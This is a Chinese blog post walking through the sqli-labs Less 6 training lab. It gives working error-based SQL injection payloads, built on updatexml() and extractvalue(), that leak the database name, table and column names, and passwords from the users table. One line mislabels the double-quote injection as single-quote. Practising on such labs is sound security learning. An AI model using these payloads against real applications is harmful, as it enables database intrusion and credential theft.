【sqli-labs】Less 6——报错注入(双引号)

最新推荐文章于 2024-03-03 22:48:33 发布
最新推荐文章于 2024-03-03 22:48:33 发布
阅读量217 收藏
点赞数
分类专栏: #sqli-labs 靶场和漏洞练习 文章标签: 数据库 sql web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_71801652/article/details/131523417
版权

打开第6关页面,提示给id赋值可查询出对应的数据。
在这里插入图片描述

1、判断注入点及注入类型
?id=1 页面正常
?id=1’ 页面正常在这里插入图片描述
?id=1" 页面出现报错信息
在这里插入图片描述
基本确定为跟上一关不同,此关为双引号注入。
?id=1" and 1=1%23 页面正常
?id=1" and 1=2%23 页面异常
至此,说明注入点为id参数,且为字符型单引号注入。

2、判断字段数
跟第5关一样进行字段数的猜测
?id=1" order by 3%23 页面正常
在这里插入图片描述
?id=1" order by 4%23 页面报错
在这里插入图片描述
由此确定,字段数为3。

3、判断回显位置
有了第5关的经验,这一关直接采用报错注入的方式来确定回显位置,为什么要使用报错注入,可见第5关

4、爆数据库,版本,当前数据库用户等信息
?id=1" and updatexml(1,concat(0x7e,database(),0x7e),1)%23
在这里插入图片描述
数据库:security
在这里插入图片描述
版本:5.5.53

5、爆数据库中表名

?id=1"  and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema="security"),0x7e),1)%23

在这里插入图片描述
得到数据库security中的表有:emails,referers,uagents,users。

6、查询指定表users中的列名

?id=1"  and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users"),0x7e),1)%23

在这里插入图片描述
users表中的列名有id,username,password。

7、查询users表中的数据

?id=1"  and updatexml(1,concat(0x7e,(select password from users limit 1,1),0x7e),1)%23

在这里插入图片描述

注意回显数据超过一行,无法显示,需要使用limit函数,只读取一个。
这里使用其他报错注入函数进行注入也是OK的!
如使用extractvalue()函数
语法为:extractvalue(‘目标xml文件名’,‘在xml中查询的字符串’)

在这里插入图片描述

Coisini话不投机养乐多
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labsLess 5——注入(updatexml()函数)
用博客做做记录的小白
06-23 1922
sqli-labs靶场第五关less 5,使用注入函数updatexml()进行注入注入类型为单引号字符型。
sqli-labs通关全解--关于注入--less5-6-3
cyynid的博客
01-10 571
注入+less5+less6
sqli-labs-基于注入
zlloveyouforever的博客
04-30 2779
这里使用sqli-labs第六关来学习注入,当然第五关也是可以使用的。会简单介绍updatexml(),extractvalue(),floor(),exp(),geometrycollection(),multipoint()六个函数的使用。
SQLi LABS Less-6 注入+布尔盲注
热门推荐
wangyuxiang946的博客
06-26 1万+
sqlilabs 第六关,sqli-labs less-6,sqlibals less 6
sql_lab之sqli中的注入less13
qq_59020256的博客
12-21 539
或者用1') and extractvalue('1',concat('1',database())) -- s。注意该结果只能显示一行,所以说需要username和password分开查询,否则会出现误。2.输入用户名和密码123’ 123显示登录误。1.输入用户名和密码123 123显示登录误。6.查询username和password。123后面有’)说明是’)注入。5.查询users用户的字段名。注入less-13)Username结果显示。Password结果显示。
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs如何解决
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
jeakinscheung-sqli-labs-php7-master.zip
03-16
sqli创建数据库连接发现连接不了,这种原因是现在大部分人用的php7,原版的sqli只支持php5.
【SQL注入sqli-labs手注+sqlmap
m0_63563528的博客
07-19 2056
第一周:SQL注入学习
SQLilabs的第19关——http请求头注入(Referer)(注入
qq_73393033的博客
07-22 353
该语句表示显示第12个字符后面的12个字符(包括第12个字符)。在判断闭合方式时,我们发现该网站会返回误,说明该网站适合使用注入。我们在截取的数据包中的Referer上加上一个'。我们发现数据没有显示完全,我们还使用mid函数,比如输入语句。它显示了Referer,我们大胆猜测注入点在这里。在进行一次验证,在referer的后面输入。这时就不会了,可以确定闭合方式是单引号。这说明闭合方式就是'。
SQL-labs的第34关——注入 宽字节注入(POST)
qq_73393033的博客
08-09 336
我们发现该网站会返回信息,直接使用注入吧。发现该关还是会向危险字符自动添加斜杠。截取数据包,进行注入,输入语句。出现,说明单引号逃逸成功。我们发现无法中和反斜杠。
sql 注入sqli-labs/less-5 双注入,也称:注入
最新发布
没有故事
03-03 983
模板:select * from user where id=1 and (updatexml("任意字符", concat(0x7e,模板:select * from user where id =1 and (extractvalue(1,concat(0x7e,,0x7e),"任意字符"));该关卡返回正确或者误页面,还有误的代码,所以可以使用注入。limit 0,1 limit 1,1 limit 5,1 分别查出字段名。0x3c,0x68,0x72,0x2f,0x3e : 换行符。
sql注入——注入
m0_73756016的博客
10-18 1433
注入是什么 什么是注入? 这是一种页面响应形式。响应过程如下: 用户在前台页面输入检索内容 后台将前台页面上输入的检索内容无加区别的拼接成sql语句,送给数据库执行。 数据库将执行的结果返回给后台,后台将数据库执行的结果无加区别的显示到前台页面上。 注入存在的基础:两个“无加区别”后台对于输入输出的合理性没有做检查 分类 1. 通过floor()注入 2.通过extractValue()注入 3.通过updateXml()注入 4.通过NAME_CONST()
sqli-labs Less-5 (注入
A9874564的博客
02-25 4209
在实际场景中,如果没有一个合适的数据返回点,而是仅仅带入Sql数据进行查询,就需要注入。 1.less 5 正常情况,我们构造闭合,发现没有问题 利用前几关的思路,发现无论怎么操作都是You are in......,这个时候一般的思路就行不通。 发现:仅带入Sql数据进行查询,没有一个合适的数据返回点,这时候可以尝试注入。 2.注入 2.1 extractvalue 示例: and extractvalue(null,concat(0x7e,(sql_inje.
SQLi-Labs 基于的SQL注入
shangMD01的博客
02-17 2481
实验环境 操作系统:Windows10 安装应用软件:Sqlmap、Burpsuite、FireFox浏览器插件Hackbar等 靶机:A-SQLi-Labs 安装的应用软件:Apache、MYSQL、PHP;DVWA、SQLi-Labs 实验步骤: 1.访问目标网站 在Windows10上打开火狐浏览器,并访问靶机上的SQLi-labs网站Less-1 http://靶机ip/sql/Less-1 登录后,先给一个GET参数: http://靶机ip/sql/Less-1/?i
sqli-labs 11~14 多命通关攻略(注入
两个月亮
01-16 525
由于该关卡中会提示误信息,所以我们可以通过注入来爆破数据库。
Sqli_labs第二十五关(注入)
m0_65463546的博客
12-18 358
本人呢也是学习Sql注入不久的小白,可能对此题理解的也不是很透彻,但是也算摸爬滚打的把这题做出来了,跟大家一起分享分享,有什么不足的地方欢迎大家指正!相信做到这里的小伙伴对什么是联合注入、盲注啊,单引号爆点位这种基本注入方式已经很熟悉了,我也不做过多的废话在这上面,直接开始我们的正题。
sqli-labs less
07-28
- *1* *2* *3* [sqli-labs教程——Less 1-10](https://blog.csdn.net/qq_25649867/article/details/111020393)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值